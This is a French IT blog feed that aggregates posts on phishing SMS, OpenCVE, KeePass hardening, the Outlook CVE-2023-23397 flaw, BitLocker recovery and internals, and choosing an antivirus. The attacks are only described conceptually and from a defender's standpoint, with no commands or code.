Vue normale

Il y a de nouveaux articles disponibles, cliquez pour rafraîchir la page.
À partir d’avant-hierIT

Ubiquiti : Comment mettre à jour UniFi Network Application via SSH ?

Hey ! Bonjour à toutes et à tous ! 🤙 Nous voilà de nouveau réunis pour cette fois-ci parler Ubiquiti et plus précisément comment mettre à jour UniFi Network Application via un accès SSH. Pour rappel, la dernière fois, nous avions vu comment mettre à jour un point d’accès via SSH. Introduction UniFi Network Application, …

Comment configurer l’enregistrement DMARC pour Office 365 / Microsoft 365

Nous y voilà ! La dernière étape pour correctement configurer et protéger votre adresse e-mail. Nous avons récemment vu comment configurer DKIM ou encore le SPF qui sont deux méthodes pour authentifier vos e-mails. Aujourd’hui nous allons parler du DMARC. Le Domain-based Message Authentication, Reporting and Conformance est un protocole qui assure la protection des …

[enquête] D’où viennent ces faux SMS ?

Par : Mr Xhark
2 juin 2023 à 08:00

Une belle enquête de Micode qui a cherché à savoir qui se cachait derrière ces faux SMS Ameli, Colis, Netflix, etc

La vidéo dure 1h mais le sujet est abordé en long et en large, ça se regarde très bien !

Mon conseil pour éviter de donner des informations confidentielles à quelqu'un qui se fait passer pour votre banque au téléphone : demandez lui de lister les 3 derniers mouvements de votre compte et les montants associés, ainsi qu'un numéro de téléphone pour le rappeler. S'il refuse, raccrochez. Avec les fuites de données il peut avoir un nombre de données personnelles considérables sur vous, cela n'authentifie en rien son identité (même s'il connait certains chiffres de votre CB). Vous pouvez aussi lui demander de vous envoyer un message dans votre espace personnel bancaire, un escroc ne pourra pas le faire.

Dans tous les cas une banque ne vous demandera jamais de confirmer quoi que ce soit pour bloquer votre compte, votre simple accord par téléphone suffit. J'ai déjà eu le cas avec Boursorama qui m'a appelé car un paiement leur semblait suspect. J'ai confirmé que j'en étais bien à l'origine et ils ont débloqué ce paiement qu'ils avaient mis en attente.

Enfin, signalez au 33700 tout spam / phishing que vous recevez, c'est entièrement gratuit il vous suffit de leur transmettre le contenu du message, puis vous devrez répondre à quelques questions par SMS (numéro expéditeur, date, heure, etc).

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 02/06/2023 | Pas de commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article [enquête] D’où viennent ces faux SMS ? provient de : on Blogmotion.

OpenCVE (saucs) revient avec une v2

Par : Mr Xhark
5 août 2023 à 08:00

J'ai découvert l'outil OpenCVE il y a quelques années, il s'appelait encore saucs, parce que la boite dans laquelle je travaillais ne voulait pas souscrire d'abonnement à service de suivi des vulnérabilités. Gratuit et français, que demander de plus ?

L(outil était sympa, mais un peu basique. Quand une nouvelle faille sortait je recevais une notification par email, et cela me facilitait la tâche. Mais les notifications étaient parfois nombreuses, dès qu'une virgule changeait rebelote un nouvel email.

J'ai donc hâte de voir la sortie de OpenCVE v2, merci à @ncrocfer

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 05/08/2023 | Pas de commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article OpenCVE (saucs) revient avec une v2 provient de : on Blogmotion.

Comment bruteforcer KeePass 💣(et s’en protéger)

Par : Mr Xhark
25 août 2023 à 18:47

Hamza Kondah propose de temps en temps des webinaires via les réseaux sociaux. Hier il proposait un webinaire sur la sécurité de KeePass avec une démo de bruteforce mais aussi quelques conseils sur les options de sécurité à activer :

Le bureau sécurisé est une des options que j'active systématiquement et en premier lieu. Elle devrait d'ailleurs est active by design car elle n'a aucune incidence sur l'expérience utilisateur (même en bureau à distance tout fonctionne bien).

En revanche j'ai augmenté le nombre d'itération de ma base car j'étais toujours sur le paramètre de base, qui est ridiculement bas.

Vous pouvez également utiliser un fichier comme clé, dans ce cas le bruteforce sera impossible... attention à ne jamais modifier ce fichier et à bien le sauvegarder, sans donner d'indice sur le fait qu'il s'agit d'une clé pour déverrouiller votre base 😉

Enfin, mettez à jour KeePass (et ses plugins) dès qu'une mise à jour est disponible, il y a régulièrement des CVE qui sortent dont certaines sont critiques.

Merci Hamza 👍

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 25/08/2023 | Un commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article Comment bruteforcer KeePass 💣(et s’en protéger) provient de : on Blogmotion.

Contrôler un PC avec une invitation Outlook (CVE 2023-23397)

Par : Mr Xhark
8 septembre 2023 à 08:00

Voilà qui devrait rappeler des souvenirs à ceux qui ont connu le ver I Love You ♥

Waked propose une démo de l'exploitation de la vulnérabilité Outlook CVE 2023-23397. Une exploitation originale qui permet de faire récupérer le condensat Net-NTLMv2 de l'utilisateur à cause d'une notification wav qui pointe vers un partage SMB (format UNC) :

Ici il est important d'avoir les mises à jour côté client (Outlook, donc pack Office) ET côté serveur (Exchange). Microsoft a publié un script permettant de savoir si un serveur exchange a été compromis.

Le correctif a d'ailleurs été contourné quelques semaines plus tard, il a du faire l'objet d'un nouveau patch 😝

 

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 08/09/2023 | Pas de commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article Contrôler un PC avec une invitation Outlook (CVE 2023-23397) provient de : on Blogmotion.

Comment les DRM des DVD sont tombés (HDCP, AACS)

Par : Mr Xhark
15 octobre 2023 à 08:00

Retour sur l'histoire des protections embarquées sur le DVD : HDCP et AACS pour les intimes.

Avec l'origine de cette fameuse image composée de plusieurs couleurs 😁

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 15/10/2023 | Pas de commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article Comment les DRM des DVD sont tombés (HDCP, AACS) provient de : on Blogmotion.

BitLocker : peut-on déverrouiller un disque sans clé de récupération ?

Par : Nautilus
5 décembre 2023 à 06:00

BitLocker est une fonctionnalité de Microsoft qui permet de chiffrer un disque de manière efficace et sécurisée. Cela permet de protéger vos données les plus sensibles et les plus importantes contre toute tentative malveillante. Mais que faire en cas de perte de la clé de récupération ou d’oubli du mot de passe BitLocker ?

Peut-on déverrouiller BitLocker sans clé de récupération ? La réponse n’est pas si simple. On pourrait dire que non, puisque c’est la base même de la protection de BitLocker, mais cela dépend du contexte. Nous allons donc d’abord détailler les trois scénarios (contextes) principaux, puis vous expliquer pourquoi les outils de récupération ne sont pas si fiables et comment déverrouiller un disque sans clé de récupération (spoiler alert : il y aura des malheureux !).

Déverrouiller BitLocker : différents scénarios

Tout d’abord, qu’entend-on par « déverrouiller BitLocker » ? Est-ce en cas de blocage au démarrage du PC ? Est-ce pour désactiver BitLocker après l’ouverture de Windows ? Ce sont deux situations complètement différentes, lisez ceci pour savoir dans quel contexte vous êtes.

BitLocker bloque votre PC au démarrage

BitLocker bloque au démarrage

Si vous êtes dans une situation critique où BitLocker bloque votre PC au démarrage de Windows, il vous faudra obligatoirement retrouver votre clé de récupération constituée de 48 chiffres. En effet, en cas de détection de modification matérielle ou autre par la puce TPM, celle-ci déclenche une sécurité qui demande la clé de récupération. Et oubliez toute tentative de désactiver BitLocker dans le BIOS (UEFI), c’est impossible pour la simple et bonne raison que BitLocker est un programme tournant sous Windows et non sous BIOS/UEFI.

Le seul moyen alors de déverrouiller BitLocker ou votre disque est d’utiliser la clé de récupération qui vous a été donnée lors de l’activation de BitLocker et du cryptage de votre disque. Suivez ce guide pour :

Retrouver la clé de récupération de BitLocker

Vous avez oublié le mot de passe (PIN) de BitLocker

BitLocker oubli mot de passe ou PIN

BitLocker permet, sur les versions professionnelles de Windows, d’imposer un mot de passe, un code PIN, une clé de démarrage ou même une combinaison de ces méthodes pour déverrouiller BitLocker. Si vous avez oublié votre mot de passe ou votre code PIN, la situation n’est pas sans issue. En effet, BitLocker fournit une clé de récupération au moment où vous chiffrez votre lecteur pour la première fois.

Par conséquent, pour déverrouiller BitLocker en cas d’oubli de mot de passe vous pouvez utiliser la clé de récupération que vous pouvez retrouver grâce à l’ID ou au fichier texte enregistré ou imprimé. Sinon cliquez sur le lien juste au-dessus pour retrouver la clé de récupération.

i Note : une fois que vous avez accès à votre système, nous vous conseillons fortement de réinitialiser votre mot de passe ou votre code PIN.

Vous accédez à Windows

BitLocker ne bloque pas votre PC et vous parvenez à ouvrir votre session Windows comme d’habitude ? Alors dans ce cas, quand vous dites « déverrouiller BitLocker », vous pensez certainement à désactiver BitLocker ou à déchiffrer le disque. Pour cela, il existe différents moyens que nous avons énumérés dans les tutoriels suivants :

Comment désactiver BitLocker sur Windows [11, 10] ?

Désactiver BitLocker avec CMD sur Windows [10, 11]

! Attention : le fait de désactiver BitLocker (ou déverrouiller BitLocker) sur un disque entraîne le déchiffrement dudit disque. Cela libère donc votre disque, mais a contrario cela signifie aussi que vos données sont devenues lisibles par quiconque vole votre machine ou la contrôle à distance.

Les outils de récupération de clé BitLocker sont-ils fiables ?

Là, on touche un sujet délicat. Vous allez vite comprendre deux choses : BitLocker est solide et toute tentative de récupération de clé (hors voie normale) relève du piratage informatique. Et si vous faites appel à un service professionnel de récupération de données, sachez que cela peut être coûteux et que le résultat n’est pas garanti.

BitLocker dispose d’un haut niveau de sécurité

Premièrement, BitLocker est spécialement conçu pour être très sécurisé, et en principe, sans le mot de passe ou la clé de récupération, il devrait être pratiquement impossible de déchiffrer les données. On parle quand même d’un chiffrement AES 128 bits, voire 256 bits, ce qui est costaud. Ensuite, le mot de passe et la clé de récupération sont précieusement gardés par le module TPM 2.0 qui ne les délivre que lorsqu’il constate que tout est dans la normalité (pas de changement de carte mère ou d’autres éléments comme l’ordre des périphériques de démarrage). Le niveau de protection est par conséquent très élevé.

Oubliez les services de récupération gratuits

Deuxièmement, BitLocker protège si bien ses données chiffrées que vous ne pourrez évidemment pas compter sur des services ou des outils de récupération gratuits. Ils sont trop légers. De toute manière, généralement le gratuit se paie sur votre dos. À moins d’avoir affaire à un service totalement bénévole (ce qui n’est presque jamais le cas), les services gratuits exploitent d’autres ressources pour subvenir à leurs besoins, notamment vos données d’utilisation et vos données personnelles.

Comme dit dans l’introduction de cette partie, vous pouvez faire appel à des professionnelles de récupération de données, mais attendez-vous à ce que cela soit coûteux et comprenez que le résultat n’est pas garanti.

Attention aux techniques de hacking

Troisièmement, toute tentative de retrouver la clé de récupération en dehors des méthodes normales (récupération par ID par exemple) signifie employer des méthodes de hacking. C’est ce que font les outils et services qui prétendent pouvoir récupérer les mots de passe BitLocker ou déverrouiller les lecteurs chiffrés sans eux. On peut citer par exemple :

  • BitCracker ;
  • Thegrideon ;
  • BitLocker Password ;
  • Elcomsoft Distributed Password Recovery ;
  • Passware Kit.

Ils utilisent différentes techniques de piratage informatique, comme l’attaque par dictionnaire, l’attaque par force brute, les attaques mixtes avancées, etc.

Ne basculez pas dans le côté obscur

Déverrouiller BitLocker sans clé de récupération
Photo de Tima Miroshnichenko (Pexels)

Il semble exister un moyen d’extraire la clé de récupération du TPM, mais cela nécessite des connaissances pointues sur le sujet. Et surtout, cela peut vite relever du piratage informatique. Aussi, faire appel aux meilleurs dans le domaine du craquage de données est fortement déconseillé. Non seulement vous encourrez des peines et autres sanctions pénales, mais vous risquez d’ouvrir une porte extrêmement dangereuse pour vos données.

Formater pour déverrouiller BitLocker sans clé ni mot de passe ?

Je pense que vous l’avez compris. Il est impossible de déverrouiller BitLocker sans clé de récupération tout en sauvegardant vos données. Sauf si vous faites allusion à la désactivation de BitLocker après l’ouverture de Windows. La clé de récupération est le Saint-Graal, le mot magique pour ouvrir la caverne d’Ali Baba. Sans elle, la seule solution qui reste (à moins de sortir de la légalité et de prendre de grands risques) pour déverrouiller BitLocker sans clé de récupération est de formater votre disque dur chiffré.

Cela a pour conséquence la perte totale de vos données, mais au moins vous pourrez réutiliser votre disque ou votre clé USB comme vous le souhaitez. Consultez notre tutoriel très complet pour :

Formater un disque (disque dur, SSD, clé USB) sur Windows

! Attention : lorsqu’un disque est chiffré par BitLocker, attention donc à bien garder secret et au frais vos mot de passe et clé de récupération. Il vous sera impossible de déverrouiller BitLocker sans clé de récupération si vous perdez le mot de passe.

Autres liens sur BitLocker

Source

Comment fonctionne BitLocker ? Explication complète

Par : Nautilus
22 décembre 2023 à 06:00

BitLocker est une fonctionnalité qui vise à protéger les données sur les ordinateurs et disques amovibles en cas de perte ou de vol, en chiffrant l’intégralité des données. Le chiffrement des données permet de protéger vos données sensibles et confidentielles. Un atout majeur quand on travaille sur PC !

OK, BitLocker chiffre les disques, mais comment cela fonctionne concrètement ?

  • Quel chiffrement utilise BitLocker ?
  • Pourquoi a-t-il besoin d’une puce TPM ? Et qu’est-ce que c’est d’ailleurs ?
  • Qu’est-ce qui déclenche BitLocker ?
  • Est-ce que BitLocker est fiable ?

Autant de questions pour lesquelles nous essayons d’apporter des réponses pour comprendre comment fonctionne BitLocker.

BitLocker : c’est quoi et pourquoi l’utiliser ?

Qu’est-ce que BitLocker ?

BitLocker est une technologie de chiffrement intégrée dans certaines versions de Windows. Le premier service de chiffrement des données BitLocker est apparu avec Windows Vista pour professionnels et entreprises. Aujourd’hui encore, ce service de chiffrement est automatiquement proposé avec les versions pros de Windows. Mais, il existe également une version allégée pour les possesseurs de PC équipés d’une puce TPM 1.2 ou 2.0.

Cette technologie est conçue pour offrir une sécurité accrue des données. Son rôle principal est de protéger les informations stockées sur les disques durs des ordinateurs contre les accès non autorisés. BitLocker protège ainsi les PC contre la perte ou le vol de l’appareil, mais aussi contre les connexions à distance non autorisées.

BitLocker utilise ainsi des algorithmes de chiffrement pour rendre illisibles les données d’un disque dur (ou d’une clé USB d’ailleurs).

Pourquoi utiliser BitLocker ?

Nous vivons dans un monde où les données numériques sont de plus en plus nombreuses. L’utilisation de l’ordinateur est devenue monnaie courante dans la plupart des professions. Sans oublier tous ces nouveaux métiers issus de l’Internet et du monde numérique. Par conséquent, au fur et à mesure de l’utilisation de technologies liées à l’Internet (ordinateurs et autres objets connectés ou IoT), la quantité de données grossit exponentiellement. Le big data est même devenu le nouvel or noir, le nouvel Eldorado autant pour les sociétés exploitant ces données que pour les hackers.

BitLocker pour la sécurité de vos données

La sécurité des données est ainsi de plus en plus menacée. Avec la montée des cyberattaques et le risque accru de vols d’appareils, sécuriser les informations sensibles est devenu une priorité pour les personnes et les entreprises. Les pare-feu et les antivirus ne suffisent pas à empêcher le vol de données. Une fois ceux-ci franchis, le pirate a libre accès aux données si elles ne sont pas cryptées. BitLocker répond à ce besoin en fournissant une couche supplémentaire de sécurité grâce au chiffrement du disque dur.

Son utilisation est particulièrement recommandée pour sécuriser des informations sensibles et pour se conformer aux diverses réglementations en matière de protection des données.

Les prérequis et la compatibilité de BitLocker

Quel Windows pour utiliser BitLocker ?

La version complète de BitLocker (rappelez-vous, il existe une version allégée) est une fonctionnalité exclusive aux éditions professionnelle, entreprise et éducation de Windows depuis Windows Vista. Windows 10 Pro et Windows 11 Pro profitent donc de BitLocker et de son service de chiffrement. Toutes les fonctionnalités de l’application sont accessibles. Vous pourrez choisir le type de chiffrement (que nous expliquons plus bas) ou le fait de protéger la clé de récupération sur une clé USB, par exemple.

Windows Famille (Windows Home) propose cependant une version allégée de BitLocker nommée « chiffrement de l’appareil ». Pour cette version, il n’existe aucune option, hormis le fait de choisir de crypter ou non le disque dur. Mais il s’agit bien de BitLocker comme l’atteste l’utilisation de la commande « manage-bde » (pour BitLocker Drive Encryption) pour le gérer depuis l’Invite de commandes Windows. Toutefois, cette version plus légère nécessite obligatoirement une puce TPM 1.2 ou 2.0.

BitLocker fonctionnement Paramètres Chiffrement de l'appareil
Chiffrement de l’appareil sur Windows 10 Home.

Le rôle du TPM dans l’utilisation de BitLocker

Depuis la sortie de BitLocker avec Windows Vista Pro, il est recommandé d’utiliser un module TPM 1.2 (sorti en 2006) ou une version plus récente. Le TPM (pour Trusted Platform Module, Module de plateforme fiable) est une puce de sécurité intégrée à la carte mère de l’ordinateur. Il gère les clés de chiffrement de manière sécurisée. Il ajoute une couche de sécurité supplémentaire en s’assurant que le chiffrement et le déchiffrement des données se font de manière transparente et sûre.

Puce ou module TPM pour BitLocker et chiffrement des données
Puce TPM 2.0

Le TPM a aussi pour rôle de vérifier l’intégrité du système. En cas de modification qualifiée d’anormal du système, le module de sécurité bloque la délivrance de la clé de chiffrement. Les données du disque dur crypté sont ainsi préservées. Les modifications anormales peuvent par exemple être :

  • le changement de carte mère ;
  • le changement de système d’exploitation ;
  • la modification de l’ordre des périphériques de démarrage, etc.

Si aucun TPM n’est présent, BitLocker (version pro) peut toujours être utilisé, mais avec des méthodes alternatives pour la gestion des clés.

Pas de TPM dans votre PC ?

Dans les systèmes sans TPM, BitLocker offre la possibilité de démarrer avec une clé de démarrage stockée sur une clé USB ou d’utiliser un mot de passe au démarrage. Ces méthodes garantissent que le chiffrement reste efficace, bien qu’elles puissent être légèrement moins pratiques que l’utilisation d’un TPM.

Ces options sont proposées au moment d’activer BitLocker sur votre PC.

! Attention : BitLocker de Windows Home nécessite obligatoirement un TPM 1.2 minimum. Le TPM 2.0 étant recommandé pour plus de sécurité. Tous les ordinateurs vendus depuis 2016 sont normalement compatibles TPM 2.0 depuis une exigence imposée par Microsoft.
i Note : en général, BitLocker fonctionne bien avec la plupart des logiciels sans interférence. Mais, certains logiciels de gestion de disque ou de récupération de données peuvent ne pas être compatibles avec des disques chiffrés. Vérifiez donc la pleine compatibilité des logiciels avant d’activer BitLocker.

Le processus de chiffrement avec BitLocker

Vous souhaitez comprendre le fonctionnement interne de BitLocker la solution de chiffrement de disque intégrée de Microsoft ? Découvrez les algorithmes utilisés, la méthode de chiffrement des disques et les étapes initiales de configuration et d’activation.

Les algorithmes de chiffrement utilisés par BitLocker

AES : le standard de chiffrement utilisé

BitLocker utilise AES (Advanced Encryption Standard, Standard de chiffrement avancé) comme algorithme de chiffrement. Il est reconnu pour sa robustesse et est largement utilisé dans diverses applications de sécurité dans le monde entier. AES est disponible en deux variantes de longueur de clé : 128 bits et 256 bits. Les VPN et autres systèmes de sécurité, comme les gestionnaires de mots de passe, utilisent les AES-128 et AES-256.

SubBytes operation for AES
Représentation du chiffrement AES ©Matt Crypto.

Avec BitLocker, le paramètre de chiffrement par défaut est AES-128, mais les options sont configurables à l’aide des paramètres de stratégie (indisponibles dans la version allégée pour Windows Home).

Mode de chiffrement BitLocker

Avec BitLocker, vous allez le choix entre le mode CBC-AES et le mode XTS-AES.

  • CBC-AES (Cipher Block Chaining-AES) est considéré comme sûr, mais peut être vulnérable à certaines attaques, comme les attaques par padding oracle, en cas de mise en œuvre incorrecte. Ce mode de chiffrement est plutôt apprécié pour des données en transit, comme les données envoyées sur Internet.
  • XTS-AES (XEX-based Tweaked CodeBook mode with Ciphertext Stealing-AES) est spécialement conçu pour le chiffrement de disques ou de support de stockage. Il chiffre les données par blocs, mais utilise un « tweak » (une sorte de paramètre ajusté) pour chaque bloc, rendant le chiffrement de chaque bloc unique même si les données sont identiques. Ce mode est considéré comme le plus sûr pour le chiffrement de disques. BitLocker, TrueCrypt ou VeraCrypt utilise essentiellement ce mode de chiffrement.

Vous l’avez compris, au moment de choisir le mode de chiffrement de votre disque dur, choisissez XTS-AES !

Comment BitLocker chiffre-t-il un disque ?

Le processus de chiffrement

Lorsque BitLocker est activé sur un disque, il chiffre chaque bloc de données individuellement. Ce processus commence par la conversion des données en un format crypté, rendant les données illisibles sans la clé de chiffrement appropriée. BitLocker travaille en arrière-plan, permettant aux utilisateurs de continuer à utiliser leur système pendant le chiffrement.

Chiffrement des données et des fichiers système

Quand il s’agit de chiffrer un disque système, BitLocker chiffre non seulement les fichiers de l’utilisateur, mais aussi les fichiers système. Cela garantit ainsi une sécurité complète du disque. Pour les disques de données, BitLocker chiffre l’intégralité du disque, protégeant ainsi toutes les données stockées.

L’initialisation de BitLocker

Activer BitLocker

L’activation de BitLocker peut se faire depuis le Panneau de configuration, les Paramètres de Windows ou encore en utilisant des commandes spécifiques via PowerShell ou Invite de commandes (CMD). Lors de l’activation, BitLocker vérifie la configuration du système pour s’assurer qu’il répond aux exigences nécessaires, comme la présence d’un TPM.

i Note : il arrive parfois que le module TPM ne soit pas activé alors qu’il est bien présent sur votre carte mère. Consulter Windows 11 : activer le TPM 2.0 dans le BIOS/UEFI.

BitLocker : chiffrer un disque sur Windows

Activer BitLocker sur Windows 10 (chiffrement)

Configuration et choix des options de sécurité

Durant la configuration du chiffrement de l’appareil, vous avez la possibilité de configurer les paramètres de sécurité :

  • le mode d’authentification (TPM, mot de passe ou clé USB) ;
  • la force du chiffrement (de CBC-AES-128 à XTS-AES-256).

BitLocker initialise ensuite le processus de chiffrement du disque.

Génération de la clé de récupération

Durant cette initialisation, une clé de récupération est générée. Cette clé est cruciale pour accéder au disque en cas de perte du mot de passe, de blocage du PC par BitLocker ou de défaillance de ce dernier. Il est fortement recommandé de sauvegarder cette clé en lieu sûr. Si vous possédez un compte Microsoft, celui-ci sauvegarde la clé de récupération. Sinon, pensez à l’impression papier ou à la sauvegarde sur un disque externe.

BitLocker : utiliser une clé de récupération pour déverrouiller un lecteur

Modes d’authentification et clés de sécurité

L’efficacité de BitLocker repose non seulement sur son robuste processus de chiffrement, mais aussi sur ses méthodes d’authentification et de gestion des clés de sécurité.

Utilisation du TPM

Le TPM est un composant matériel qui offre une sécurité accrue pour le stockage des clés de chiffrement. Utilisé à BitLocker, le TPM stocke la clé de chiffrement et la libère uniquement si les conditions de démarrage n’ont pas été altérées. Cela signifie que si un attaquant tente de démarrer l’ordinateur avec un disque dur différent ou après avoir modifié le logiciel de démarrage, le TPM ne libérera pas la clé. Ce qui empêche l’accès aux données chiffrées.

C’est la raison pour laquelle, sur un ordinateur en dual boot, par exemple, vous ne pourrez pas lire les données cryptées d’un disque système depuis un autre système d’exploitation.

Dual boot sur un PC Windows
Deux versions de Windows 10 installées sur un même PC.

Authentifications de BitLocker sans TPM

  • Mots de passe au démarrage. Si aucun TPM n’est disponible, BitLocker propose l’utilisation d’un mot de passe (code PIN) au démarrage. Le mot de passe doit donc être entré à chaque démarrage du PC. Il ne remplace pas le mot de passe d’ouverture de session Windows.
  • Clé USB de déverrouillage. Une clé USB peut être spécialement utilisée pour déverrouiller BitLocker grâce à la clé de démarrage. Le système d’exploitation ne peut pas se charger sans cette clé USB et l’accès au disque est refusé.

Gestion des clés de récupération BitLocker

Lorsque vous activez BitLocker pour la première fois, une clé de récupération est automatiquement générée. Cette clé est essentielle pour décrypter le chiffrement du disque protégé en cas d’oubli du mot de passe (code PIN), de la perte de la clé USB de déverrouillage ou de blocage du PC par le TPM.

! pensez à bien sauvegarder la clé de récupération dans un endroit sûr et accessible. L’une des meilleures options reste d’utiliser le compte Microsoft qui sauvegardera votre clé de récupération. Si vous utilisez plusieurs clés de récupération (plusieurs PC), c’est l’ID de clé de récupération qui vous permettra de retrouver la bonne clé de récupération BitLocker.

Chiffrement BitLocker ID de clé de récupération
BitLocker indique l’ID pour récupérer la clé de récupération.

BitLocker en utilisation quotidienne

Sachez tout d’abord qu’à l’utilisation au quotidien, BitLocker est complètement invisible et n’entrave en rien votre travail. Et au niveau performances ? Voyons cela en détail.

L’accès aux données chiffrées

L’expérience utilisateur et l’accès aux données pour l’utilisateur autorisé sont complètement transparents. Une fois que le disque crypté est déverrouillé (TPM, clé USB, mot de passe), l’accès aux données enregistrées sur le disque se fait naturellement, de la même manière que pour un disque non chiffré. BitLocker déchiffre les données à la volée lorsqu’elles sont lues puis les chiffre à nouveau lorsqu’elles sont écrites (crées ou modifiées), sans intervention manuelle de l’utilisateur.

Le partage et la collaboration fonctionnent aussi comme d’habitude. Les fichiers peuvent être copiés ou déplacés vers d’autres emplacements. Et, lorsqu’ils sont transférés hors du disque chiffré, BitLocker les déchiffre automatiquement.

L’impact sur les performances informatiques

Avec les avancées matérielles, notamment les processeurs de nouvelle génération et les disques SSD, l’impact de BitLocker sur les performances est généralement minime. Il est imperceptible. La plupart des utilisateurs ne remarquent pas de différence significative dans les temps de démarrage ou lors de l’accès aux fichiers.

En revanche, sur des systèmes plus anciens ou peu puissants, l’utilisation de BitLocker peut entraîner une légère diminution des performances. Ceci notamment lors de tâches exigeant beaucoup de lecture et d’écriture sur le disque (comme la lecture de films en 4K par exemple). Cependant, selon plusieurs utilisateurs le ralentissement serait de l’ordre de 1 à 2 %, ce qui est imperceptible pour nous, même sur un vieux Intel Celeron®.

La gestion de BitLocker dans un environnement d’entreprise

L’implémentation de BitLocker dans un cadre d’entreprise nécessite une approche structurée pour assurer à la fois la sécurité des données et la gestion efficace des ressources. Voici quelques éléments clés pour gérer BitLocker dans un environnement professionnel.

Politiques de chiffrement centralisées

Votre entreprise doit établir une politique claire concernant le niveau de chiffrement requis, en choisissant entre :

  • un chiffrement AES 128 ou 256 bits ;
  • un mode CBC ou XTS ;
  • une authentification par mot de passe, clé USB ou TPM.

Cette politique doit être appliquée de manière cohérente à travers l’organisation pour maintenir un standard de sécurité uniforme.

Aussi, les administrateurs système peuvent utiliser Group Policy (Éditeur de stratégie de groupe locale) dans Windows pour configurer les paramètres de BitLocker sur plusieurs machines. Cela permet de définir des politiques de chiffrement, des méthodes d’authentification et des stratégies de sauvegarde des clés de récupération de manière centralisée.

Gestion des clés de récupération

Dans un environnement d’entreprise, il est crucial de stocker les clés de récupération de manière sécurisée, tout en garantissant que les administrateurs autorisés puissent y accéder en cas de besoin. Les solutions peuvent inclure l’intégration avec Active Directory, où les clés de récupération peuvent être stockées de manière centralisée et sécurisée.

Pensez également à mettre en place des procédures d’audit pour suivre l’utilisation et l’accès aux clés de récupération. Cela permettra de se conformer aux réglementations en matière de protection des données et de sécurité informatique.

Formation et sensibilisation des utilisateurs

La formation de vos employés sur les bonnes pratiques de cyberdéfense est cruciale. Il en est de même pour une formation sur l’utilisation correcte de BitLocker. Cela inclut la sensibilisation à l’importance de la sécurité des mots de passe et à la gestion des clés USB de démarrage, le cas échéant.

Découvrez nos autres articles autour de BitLocker pour apprendre à le maîtriser parfaitement. 👇

Autres liens sur le fonctionnement de BitLocker

Source

Meilleur antivirus 2024 : quel antivirus choisir pour Windows 11 et 10 ?

Par : Le Crabe
10 janvier 2024 à 08:00

Quel est le meilleur antivirus en 2024 ? Quel antivirus choisir pour Windows 11 ou Windows 10 ? Antivirus gratuit ou payant ? Voici toutes les questions que vous vous posez au moment de choisir le logiciel de sécurité indispensable pour un PC Windows : l’antivirus.

Avec toutes les offres disponibles sur le marché, il est parfois difficile de faire un choix et de savoir quel antivirus choisir. Et en installant un mauvais antivirus, votre ordinateur risque d’être mal protégé et de se faire infecter par des virus et des malwares.

Dans cet article, nous allons voir comment choisir un bon antivirus, les antivirus à privilégier ainsi que les meilleurs antivirus pour PC Windows à partir des résultats des tests réalisés par des organismes indépendants.

Pourquoi faut-il installer un antivirus ?

Un antivirus permet de protéger un ordinateur contre les virus et les logiciels malveillants qui pullulent sur Internet. Son objectif est de détecter les virus et de les neutraliser avant qu’ils ne pénètrent sur le système et le contaminent.

C’est LE logiciel de sécurité à installer absolument, notamment sur un PC Windows. En effet, Windows étant de loin le système d’exploitation le plus populaire, il est la cible n°1 des pirates et de leurs virus.

L’antivirus est d’autant plus indispensable que les menaces se multiplient et se diversifient : chevaux de Troie, rootkits, ransomwares… On parle aujourd’hui de logiciels malveillants (malwares) pour qualifier l’ensemble des menaces informatiques (dont les virus font partie).

Les logiciels antivirus ont su s’adapter et savent désormais protéger les ordinateurs contre tous types de logiciels malveillants. Ils ne se contentent plus d’éradiquer les seuls virus : ils font office d’antivirus mais aussi d’anti-trojans, d’anti-rootkits, d’anti-ransomwares… Ce sont désormais des anti-malwares, bien que beaucoup d’entre eux gardent leur appellation d’origine « antivirus », plus commerciale.

Choisir son antivirus

Les critères pour bien choisir son antivirus

Pour qu’un antivirus soit considéré comme bon, il faut qu’il respecte plusieurs critères :

  • Efficace dans la détection et la suppression des virus : il faut que le moteur antivirus du logiciel soit capable de détecter les virus connus et de vous alerter lorsqu’une action suspecte se passe sur le système. Il doit aussi être en mesure de supprimer ou de mettre en quarantaine les virus qu’il a détectés. Sa base de données virale doit également être à jour avec les dernières menaces connues.
  • Peu d’impact sur les performances du système : étant donné qu’un logiciel antivirus doit surveiller le système en permanence, il doit utiliser les ressources du système (CPU, RAM). Un bon antivirus ne doit pas manger toutes ces ressources sous peine de ralentir Windows et de rendre votre ordinateur difficile à utiliser.
  • Peu de détection de faux positifs : un faux positif est une erreur de détection où l’antivirus estime qu’un fichier est malveillant alors qu’il est sain. Un bon antivirus doit savoir détecter autant que possible les vraies menaces. Il ne soit pas vous alerter pour rien ou pire supprimer/mettre en quarantine des fichiers système ou des fichiers personnels sains.
  • Facile d’utilisation : un bon antivirus doit avoir une interface intuitive, facile à utiliser, dans laquelle il est facile d’accéder aux différentes fonctionnalités. L’utilisateur doit comprendre ce que fait l’antivirus, un manuel intégré ou des bulles informatives sont un plus.
Crédits : TeroVesalainen

Antivirus gratuit ou payant ?

Les antivirus gratuits et payants offrent le même niveau de protection face aux virus et aux logiciels malveillants.

Il y a en revanche trois différences importantes entre antivirus gratuit et payant :

  • La confidentialité des données personnelles de l’utilisateur.
  • Les fonctionnalités de protection.
  • La publicité.

> Confidentialité

Pour financer le développement et en contrepartie de la gratuité de leurs logiciels antivirus, certains éditeurs collectent des données sur leurs utilisateurs pour les revendre à des entreprises. Oui, quand c’est gratuit, c’est vous le produit.

